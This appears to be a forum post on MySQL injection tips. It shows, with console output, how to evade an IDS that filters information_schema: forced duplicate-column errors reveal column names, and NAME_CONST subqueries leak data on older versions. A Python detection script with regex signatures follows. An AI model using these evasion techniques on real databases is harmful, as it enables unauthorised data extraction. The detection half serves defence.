New tips for MySQL injection

1. Bypassing an IDS that filters information_schema and continuing the injection (source: pentest.cc)
// Use MySQL's own error messages to leak column names
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name 'Password'
.....
// Retrieving data
// Possibly a version issue; my test did not succeed
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
It seems the arguments to NAME_CONST must be constants, or something along those lines; too bad.
I'll test it more carefully next time.

Update: (source: toby57)
It is indeed a version issue (newer versions require every argument to be a constant, otherwise an error is raised), so this method does not look very portable.
mysql> SELECT version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT user()),0);
+----------------+
| root@localhost |
+----------------+
| 0              |
+----------------+
1 row in set (0.00 sec)

-------------------------------------
mysql> SELECT version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
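The point of both tricks above is that a filter which only blocks the string information_schema misses them entirely: the column names come out of ERROR 1060, and the row data (on 5.0.x) comes out of the column header that NAME_CONST produces. The following detection script is an added example written for this post, not code from the original or from pentest.cc/toby57. It assumes a query log with one statement per line (the sample lines are constructed) and flags the two query shapes shown above alongside plain information_schema access, so a query-log or proxy-level rule can cover what a keyword blocklist does not.

```python
import re

# Constructed sample query-log lines (not taken from the original post).
# Lines 1-3 mirror the shapes shown above; lines 4-5 are benign look-alikes.
SAMPLE_QUERIES = [
    "SELECT * FROM (SELECT * FROM user A JOIN user B) C",
    "SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C",
    "SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0)",
    "SELECT NAME_CONST('id', 1)",
    "SELECT * FROM orders o JOIN customers c ON o.cid = c.id",
    "SELECT table_name FROM information_schema.tables",
]

# Shape 1: a derived table that joins one table to itself under two aliases
# with no ON clause (optionally a USING list). Such a query cannot succeed;
# its only effect is ERROR 1060 naming the next duplicate column.
SELF_JOIN_DERIVED = re.compile(
    r"\(\s*SELECT\s+\*\s+FROM\s+`?(\w+)`?\s+(?:AS\s+)?\w+\s+JOIN\s+`?\1`?\s+(?:AS\s+)?\w+"
    r"(?:\s+USING\s*\([^)]*\))?\s*\)",
    re.IGNORECASE,
)

# Shape 2: NAME_CONST whose first argument is a subquery rather than a literal.
# Legitimate NAME_CONST calls (as emitted by mysqldump for stored routines)
# take constant arguments, so a subquery here is a strong signal.
NAME_CONST_SUBQUERY = re.compile(r"NAME_CONST\s*\(\s*\(\s*SELECT\b", re.IGNORECASE)

# Shape 3: the keyword the IDS in the post already blocks, for completeness.
INFO_SCHEMA = re.compile(r"\binformation_schema\b", re.IGNORECASE)


def classify(query):
    """Return the list of signature names that match a single statement."""
    findings = []
    if SELF_JOIN_DERIVED.search(query):
        findings.append("self_join_column_enum")
    if NAME_CONST_SUBQUERY.search(query):
        findings.append("name_const_subquery")
    if INFO_SCHEMA.search(query):
        findings.append("information_schema")
    return findings


def scan(queries):
    """Map each flagged statement to its findings; unflagged ones are omitted."""
    flagged = {}
    for q in queries:
        findings = classify(q)
        if findings:
            flagged[q] = findings
    return flagged


if __name__ == "__main__":
    for query, findings in scan(SAMPLE_QUERIES).items():
        print(", ".join(findings), "<-", query)
```

The self-join signature is deliberately narrow (SELECT * from the same table twice, no ON clause) to keep false positives low; a legitimate self-join with USING would still match, so treat it as a lead rather than a verdict. The more robust signal is on the server side: a run of ERROR 1060 "Duplicate column name" or ERROR 1210 responses to the application's database user is exactly the footprint of the enumeration shown above, and is worth alerting on regardless of how the statement was spelled.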
